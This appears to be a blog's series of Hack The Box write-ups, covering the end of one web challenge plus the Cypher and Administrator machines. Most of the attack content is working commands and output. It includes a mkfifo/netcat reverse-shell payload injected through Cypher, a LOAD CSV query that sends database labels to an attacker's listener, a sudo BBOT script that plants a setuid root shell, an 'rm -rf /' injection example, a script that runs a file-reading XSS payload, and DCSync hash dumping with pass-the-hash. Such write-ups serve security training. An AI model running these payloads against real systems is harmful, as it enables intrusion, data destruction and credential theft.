When we take a look at the generateAccessCode function, we see that it only generates a 4-digit random number as a string. So, every time we fail, a new file with 4 random numbers would be created, and the ACCESS_PASS would be updated to reflect that. This logic is easily exploitable with a Python script. We can use a unique static code, say 1337 although it’s better to choose a code closer to the middle of the generated range, like 5784 or 6884 and repeatedly run it until the server randomly matches our input, granting access and allowing us to use the LFI payload.

For this, we’ll use the following Python script.

import requests
cookies = {"user": "COOKIE"} #EDIT This with your admin cookie

url = "http://94.237.54.190:44292/document/debug/export"
LFI_PAYLOAD = "<script>xhr = new XMLHttpRequest;xhr.onload=function(){document.write((this.responseText))};xhr.open('GET','file:///flag.txt');xhr.send();</script>"
access_pass = "6884"
data = {    
	"access_pass": access_pass,    
	"content": LFI_PAYLOAD
}

while True:
    response = requests.post(url, cookies=cookies, data=data)
    if response.status_code == 403:
        pass
    else:
        print("Gotcha!")
        with open("flag.pdf", "wb") as file:
            file.write(response.content)
        break

And just by running it for few minutes we get the result in a PDF with the flag!

Cypher - HTB

Sat, 01 Mar 2025 00:00:00 GMT

Cypher (10.10.11.57)

Enumeration

rustscan -a 10.10.11.57 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.57:22
Open 10.10.11.57:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.57
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 20:15 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 0.00s elapsed
Initiating SYN Stealth Scan at 20:15
Scanning cypher.htb (10.10.11.57) [2 ports]
Discovered open port 80/tcp on 10.10.11.57
Discovered open port 22/tcp on 10.10.11.57
Completed SYN Stealth Scan at 20:15, 0.10s elapsed (2 total ports)
NSE: Script scanning 10.10.11.57.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 2.54s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 0.00s elapsed
Nmap scan report for cypher.htb (10.10.11.57)
Host is up, received user-set (0.057s latency).
Scanned at 2025-03-01 20:15:57 +00 for 2s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMurODrr5ER4wj9mB2tWhXcLIcrm4Bo1lIEufLYIEBVY4h4ZROFj2+WFnXlGNqLG6ZB+DWQHRgG/6wg71wcElxA=
|   256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEqadcsjXAxI3uSmNBA8HUMR3L4lTaePj3o6vhgPuPTi
80/tcp open  http    syn-ack ttl 63
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: GRAPH ASM

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:15
Completed NSE at 20:15, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
           Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

gobuster dir -u http://cypher.htb -w /usr/share/wordlists/dirb/common.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cypher.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 200) [Size: 4986]
/api                  (Status: 307) [Size: 0] [--> /api/docs]
/demo                 (Status: 307) [Size: 0] [--> /login]
/index                (Status: 200) [Size: 4562]
/index.html           (Status: 200) [Size: 4562]
/login                (Status: 200) [Size: 3671]
/testing              (Status: 301) [Size: 178] [--> http://cypher.htb/testing/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Exploitation

Ok we have 2 services, SSH:22 and HTTP:80

It has 3 pages, the home, an about that had nothing interesting and a login page!

First thing to do was to try to mess with the login to see what’s going on!

This is interesting! We found a Cypher Query being executed here.

Additionally, during our fuzzing we discovered a /testing API that contained a JAR file. After decompiling it, we obtained this code:

package com.cypher.neo4j.apoc;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.concurrent.TimeUnit;
import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

/* loaded from: custom-apoc-extension-1.0-SNAPSHOT.jar:com/cypher/neo4j/apoc/CustomFunctions.class */
public class CustomFunctions {
    @Procedure(name = "custom.getUrlStatusCode", mode = Mode.READ)
    @Description("Returns the HTTP status code for the given URL as a string")
    public Stream<StringOutput> getUrlStatusCode(@Name("url") String url) throws Exception {
        if (!url.toLowerCase().startsWith("http://") && !url.toLowerCase().startsWith("https://")) {
            url = "https://" + url;
        }
        String[] command = {"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
        System.out.println("Command: " + Arrays.toString(command));
        Process process = Runtime.getRuntime().exec(command);
        BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
        BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
        StringBuilder errorOutput = new StringBuilder();
        while (true) {
            String line = errorReader.readLine();
            if (line == null) {
                break;
            }
            errorOutput.append(line).append("\n");
        }
        String statusCode = inputReader.readLine();
        System.out.println("Status code: " + statusCode);
        boolean exited = process.waitFor(10L, TimeUnit.SECONDS);
        if (!exited) {
            process.destroyForcibly();
            statusCode = "0";
            System.err.println("Process timed out after 10 seconds");
        } else {
            int exitCode = process.exitValue();
            if (exitCode != 0) {
                statusCode = "0";
                System.err.println("Process exited with code " + exitCode);
            }
        }
        if (errorOutput.length() > 0) {
            System.err.println("Error output:\n" + errorOutput.toString());
        }
        return Stream.of(new StringOutput(statusCode));
    }

    /* loaded from: custom-apoc-extension-1.0-SNAPSHOT.jar:com/cypher/neo4j/apoc/CustomFunctions$StringOutput.class */
    public static class StringOutput {
        public String statusCode;

        public StringOutput(String statusCode) {
            this.statusCode = statusCode;
        }
    }
}

This was vulnerable to command injection.

String[] command = {"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};

If an attacker provides a malicious URL such as "; rm -rf / #", the constructed command becomes: curl -s -o /dev/null --connect-timeout 1 -w %{http_code} ; rm -rf / #

So in theory, we can call this function within the Cypher query itself since we can inject into it to spawn a reverse shell directly!

We can also use that to read from the neo4j to an HTTP listener! To potentially dump it or enumerate over it

{"username":"admin' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://10.10.xx.xx/?l='+label as l RETURN 0 as _0 //","password":"Password123"}

Lets spawn a reverse shell!

nc -lvp 1337

{
  "username": "' OR 1=1 WITH 1 as dummy CALL custom.getUrlStatusCode('example.com; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.xx.xx 1337 > /tmp/f') YIELD statusCode RETURN statusCode as hash //",
  "password": "Password123"
}

And we got neo4j by using the rev shell payload!

There was no flag present, but we discovered another user called graphasm who had the flag in their home directory. We were also able to read their bbot_preset.yml file

config:
  modules:
    neo4j:
      username: neo4j
      password: cU4btyib.20xtCMCXkBmerhK

Hmm what are the odds that this could be a reused password?

ssh graphasm@cypher.htb
graphasm@cypher.htb's password: 

Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-53-generic x86_64)
Last login: Sat Mar 1 20:11:43 2025 from 10.10.14.229

graphasm@cypher:~$ cat user.txt
877410eb42c621eb6c4fbf31XXXXXXXX

Privilege Escalation

Of course first thing we could do is check the current user sudo perms

graphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:
    (ALL) NOPASSWD: /usr/local/bin/bbot

I noticed he had sudo access to BBOT with no password required! After looking into it, I discovered that BBOT is an OSINT (Open-Source Intelligence) tool designed for hackers. This got me thinking, could we leverage this tool to gain root access or maybe even retrieve a flag?

One interesting feature I found is the -cy argument, which allows you to add custom YARA rules. Could we craft specific YARA rules to exploit this setup and escalate privileges or uncover hidden data? I’m curious if this could be a potential path to explore.

I went to check the src code on GitHub to understand how’s that tool working and it had the ability to read Yara rules from a file and it even logs em to the console!

So we just used sudo /usr/local/bin/bbot -cy /root/root.txt -d --dry-run

and we get a very long text with the flag in there loaded from the file

Another method to get Root Shell

The following script can explot the modules creation of BBOT to pop us a root shell!

#!/bin/bash
set -e

echo "Creating malicious BBOT module config..."
cat << EOF > /tmp/myconf.yml
module_dirs:
  - /tmp/modules
EOF

echo "Creating modules directory..."
mkdir -p /tmp/modules

echo "Creating malicious whois2 module..."
cat << 'EOF' > /tmp/modules/whois2.py
from bbot.modules.base import BaseModule
import os

class whois2(BaseModule):
    watched_events = ["DNS_NAME"]
    produced_events = ["WHOIS"]
    flags = ["passive", "safe"]
    meta = {"description": "Query WhoisXMLAPI for WHOIS data"}
    options = {"api_key": ""}
    options_desc = {"api_key": "WhoisXMLAPI Key"}
    per_domain_only = True

    async def setup(self):
        os.system("cp /bin/bash /tmp/bash && chmod u+s /tmp/bash")
        self.api_key = self.config.get("api_key")
        return True

    async def handle_event(self, event):
        pass
EOF

echo "Executing..."
sudo /usr/local/bin/bbot -p /tmp/myconf.yml -m whois2

if [ -u /tmp/bash ]; then
    echo -e "\n[*] Spawning Root shell...\n"
    /tmp/bash -p
else
    echo -e "\n[-] Exploit failed"
    exit 1
fi

# Cleanup
rm /tmp/bash /tmp/myconf.yml /tmp/modules/whois2.py

FullHouse - HTB 🔒

Fri, 28 Feb 2025 00:00:00 GMT

FullHouse #1 Machine (10.13.38.31)

:::caution This Prolab is still Active on HackTheBox. Once retired, this article will be published for public access as per HackTheBox’s policy on publishing Write-ups.

For more hints and assistance, come chat with me and your peers in the HackTheBox Discord server. Or reach out to me at my other social links. :::

Administrator - HTB

Thu, 27 Feb 2025 00:00:00 GMT

Administrator (10.10.11.42)

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

echo '10.10.11.42 administrator.htb' | sudo tee -a /etc/hosts

Enumeration

nmap -sV --version-intensity 9 10.10.11.42          

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 21:07 +00
Nmap scan report for 10.10.11.42
Host is up (0.081s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-28 04:08:26Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.61 seconds

We use crackmapexec to checkout the SMB shares, users

$ crackmapexec smb administrator.htb -u 'olivia' -p 'ichliebedich' --shares                   
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\olivia:ichliebedich 
SMB         administrator.htb 445    DC               [+] Enumerated shares
SMB         administrator.htb 445    DC               Share           Permissions     Remark
SMB         administrator.htb 445    DC               -----           -----------     ------
SMB         administrator.htb 445    DC               ADMIN$                          Remote Admin
SMB         administrator.htb 445    DC               C$                              Default share
SMB         administrator.htb 445    DC               IPC$            READ            Remote IPC
SMB         administrator.htb 445    DC               NETLOGON        READ            Logon server share 
SMB         administrator.htb 445    DC               SYSVOL          READ            Logon server share 
SMB         administrator.htb 445    DC               [+] Enumerated domain user(s)
SMB         administrator.htb 445    DC               administrator.htb\emma                           badpwdcount: 2 desc: 
SMB         administrator.htb 445    DC               administrator.htb\alexander                      badpwdcount: 1 desc: 
SMB         administrator.htb 445    DC               administrator.htb\ethan                          badpwdcount: 8 desc: 
SMB         administrator.htb 445    DC               administrator.htb\emily                          badpwdcount: 0 desc: 
SMB         administrator.htb 445    DC               administrator.htb\benjamin                       badpwdcount: 0 desc: 
SMB         administrator.htb 445    DC               administrator.htb\michael                        badpwdcount: 0 desc: 
SMB         administrator.htb 445    DC               administrator.htb\olivia                         badpwdcount: 0 desc: 
SMB         administrator.htb 445    DC               administrator.htb\krbtgt                         badpwdcount: 4 desc: Key Distribution Center Service Account
SMB         administrator.htb 445    DC               administrator.htb\Guest                          badpwdcount: 4 desc: Built-in account for guest access to the computer/domain
SMB         administrator.htb 445    DC               administrator.htb\Administrator                  badpwdcount: 9 desc: Built-in account for administering the computer/domain

since we had an SFTP server running as well I tried logging in with the provided user but it didn’t work

FTP administrator.htb 21 administrator.htb [-] olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)

Time for bloodhound to get a nice schema of our AD structure to look for potential attack paths

$ bloodhound-python -d administrator.htb -ns 10.10.11.42 -u 'olivia' -p 'ichliebedich' -c all

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 28S

Bloodhound

Upon checking olivia node I found out that she has a GenericAll on michael which means she can reset his password.

And Michael can ForceChangePassword on Benjamin

Exploitation

So let’s get into it! First of all we change michal’s password using BloodyAD

bloodyAD -u "olivia" -p "ichliebedich" -d "administrator.htb" --host "10.10.11.42" set password "Michael" "pwned123"
[+] Password changed successfully!

Now we do the same for benjamin!

bloodyAD -u "michael" -p "pwned123" -d "administrator.htb" --host "10.10.11.42" set password "Benjamin" "pwned123"
[+] Password changed successfully!

Nor Benjamin or Michael had any interesting shares, couldnt get to login as Benjamin over winrm, then I recalled the FTP Server, so tried both users on it and Benjamin scored!

┌──(kali㉿kali)-[~/htb/pwn/administrator]
└─$ crackmapexec ftp administrator.htb -u 'michael' -p 'pwned123' 
FTP         administrator.htb 21     administrator.htb [*] Banner: Microsoft FTP Service
FTP         administrator.htb 21     administrator.htb [-] michael:pwned123 (Response:530 User cannot log in, home directory inaccessible.)
                                                                                                                                                                                       
┌──(kali㉿kali)-[~/htb/pwn/administrator]
└─$ crackmapexec ftp administrator.htb -u 'benjamin' -p 'pwned123' 
FTP         administrator.htb 21     administrator.htb [*] Banner: Microsoft FTP Service
FTP         administrator.htb 21     administrator.htb [+] benjamin:pwned123

So let’s check it out!

ftp administrator.htb                                                                                                                   
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): Benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50869|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 **Backup.psafe3**
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||50877|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************|   952       16.10 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (16.01 KiB/s)

We found a Backup.psafe3 file and downloaded it

It asks for a password as soon as you try to open it of course

But lucky us there is a tool called pwsafe2john that we can use to extract the password hash and crack it!

pwsafe2john Backup.psafe3 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050 > hash.txt

And voila Cracked! tekieromucho

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-02-27 22:15) 2.777g/s 17066p/s 17066c/s 17066C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                       
┌──(kali㉿kali)-[~/htb/pwn/administrator]
└─$ john hash.txt --show                                     
Backu:tekieromucho

1 password hash cracked, 0 left

Now we can use a tool called PasswordSafe to view the psafe file since sqlitebrowser wasn’t compatible

We had all 3 passwords of these users but the most precious of them was Emily, why?

Well she has access to winrm where we managed to get the first user flag!

evil-winrm -i 10.10.11.42 -u "emily" -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cd ..
*Evil-WinRM* PS C:\Users\emily> cd Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> more user.txt
11c2b26c282a378097582d31XXXXXXXX

*Evil-WinRM* PS C:\Users\emily\Desktop>

And because she had GenericWrite to Ethan!

it can be used in this case to executed a Targeted Keberoasting attack, this is the beauty of BloodHound

Keep your targets in sight, mark each compromised account, and allow the tool to illuminate your attack path.

Privilege Escalation

What’s Targeted Keberoasting?

It’s basically a refined version of the classic Kerberoasting attack, where instead of blindly requesting service tickets for all Service Principal Name (SPN)-enabled accounts, you focus on high-value targets—like Domain Admins, high-privileged service accounts, or critical systems.

And for that we’ll be using this POC that I found on github that looked pretty good and well maintained

python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Since Kerberos is very time sensitive and prob the host is set in another time zone we’d have to use ntupdate to fix that

ntpdate administrator.htb

python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$556dd5582106c92fdf2f17ff86e1e7bf$19ef29f8d48db15dbc00102af56af9e78887483d59d26260da3c4df7a8328eeb11ef17cbb9979d00c3963e2779513ded8726f687c8daab07a8443bb46129e0b05c8a6d815f2ed0d4af3889691e5b9cef4346a4b92dc51e8b309f2cb4fd239eb86e24f254076d28b1862be4fe68e5c8c2b72622c9d7e2e440e3e00be144c48a4d4b45b4050b1d211111ca544146a8c2be961bc5aaafd7fadf1a6b2249696c89877f86b1b1e084a845bc9c8230265010ce42f6e619bc51856429542aa82e04d9dea882f66a2a9311f051c98fcedfba1f19b891e4d78735aa74593e162a891564f5173235608e54148b849e83b3af6aff1656b64bdf49a3c9bf21f69d666f954953e86f39da617db69c64664304854676e52ff7955f67c6fd0e63a442366929eb5b3186b78862289665eb90a5cbed9cf1b0070ec47b2c9f30de90a2cd09fa1532ca04c2810b6dcb6daffec4c54ba88697f12b4a2aeec76ebb44b1c895b8ef818f0cb6eb578bd7b1bdf017c32dcc086b707f7da9edd1544daccd7df145300585ab2bf7509406e95c1485f2c27af1deb7c3345d9e7e4c6e6e15069be89377c7b6ececa451b45e532a0b7eb25f0805c6463fc633ee01b58b4c6c3aa051f7ce2f5b4f84a41f223aef82a044f8e0ec8a1efcc021fcb88574e408fedd8e292a92525acffd09d46db39e6c139e6e729a4ecd18945b89a5f6ede4357e047beb2406d10e3020d0bed1e98b8c389c210dbe096f8af7f5a47a02d108efa39dafda8ba62b089c06a7214a4579f058d30da85e8839a812d3f876d0169168d16094935e6bb01e3e95d4e6c6c0f78444f261b11f75f823f6b82d62c2b3d81e2dfea1556dbe240e1babfa16d52f482e28d56210c41e6673dfc15e5c56c7e6975e320428d3ed688329a02677ca3afc5bf3bafbee819b27f46c9ffa37b4244e887da0b681972e39b14072a121f187cc433ee2637018eff91129d9e02f701779f26af34e3ea351ab1e7bead0390a0e9479249bd392a3774c016d3dd4377a8cad09e650899b93527d77fee66b008842347735a06818d2d8fbb64a9aafbe55927a98600baa6999a87001987f56d474d1f20e66ad5b06b486cff97075a965454286f86857c0e3a98a857991ac2224490b8186319ba3de21cf920ddba4ad9639e59414c4eff5785773593787f367c4395e6b1ed7b8e3827b84b6d0c0177eebe857a0ff644cc36c398eb051ffa48a6a30612e8bedc34fb5543ee5fcc87d541743b88a4be95bdd2bb3c9aa8e8d1f89f9b83aeca166fcdc128aaceda68594fc7b548282380463645a62d0cb2c829dd12957d9fce8a84890109fb82c6da7f0adcde4e866241d49d22590f7b31ca146688aae13b7d075bdb16d6208c96aca4c6e6dd67027e80c081c8452186670d1fd6cf542d6504065559f6bbcea2dad63419c75017829c37158b0eab68954dd6482903d8969e0d272da914a0f579a7bd35df122e5a74fac92a91aed3039d2ee89d4b1f3388c3a53a42ba971c34764ceb5ba28c8c46451bc82b0e13bea6cb21bd7

Now we can just save that to a hash and crack it using John!

┌──(kali㉿kali)-[~/htb/Tools/targetedKerberoast]
└─$ john hash2.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-02-28 05:49) 100.0g/s 512000p/s 512000c/s 512000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                       
┌──(kali㉿kali)-[~/htb/Tools/targetedKerberoast]
└─$ john hash2.txt --show                                     
?:limpbizkit

1 password hash cracked, 0 left

And we got it! limpbizkit

Let’s not forget that we have DCSync over the Administrator

What is DCSync? It's a privilege that allows us to simulate the replication process from a remote Domain Controller. We can use this to forge krbtgt hashes, making it similar to dumping NTDS.dit but without actually copying and parsing the file. In a nutshell, we can replicate sensitive authentication data from a Domain Controller.

We will be using Impacket's SecretDumper to perform this attack

mpacket-secretsdump 'Administrator.htb/ethan:limpbizkit'@'dc.administrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

**Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd0XXXXXXXXXXXXXX:::**

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:dc4b6c4a3c30b41b2f86df423144923f:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:dc4b6c4a3c30b41b2f86df423144923f:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:4de39e612c89267083fe32a66e962e869ca1c9909505c3a38337471825101a77
administrator.htb\michael:aes128-cts-hmac-sha1-96:e66b62b16a8ab4f343fbbcb078357c5d
administrator.htb\michael:des-cbc-md5:4098a46413d35740
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:39474a091b46c5b2b0fe2e081394cf51146f4bf1a4d6da4c8f13d466a84d5f70
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:0e929fc374cbba31f8354ad3dc6ff1d6
administrator.htb\benjamin:des-cbc-md5:2019976289d0fe26
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

Finally we can use that hash with evil-winrm to access the administrator account directly!

evil-winrm -i 10.10.11.42 -u "Administrator" -H '3dc553ce4b9fd20bd0XXXXXXXXXXXXXX'
                                        
Evil-WinRM shell v3.7
                                        
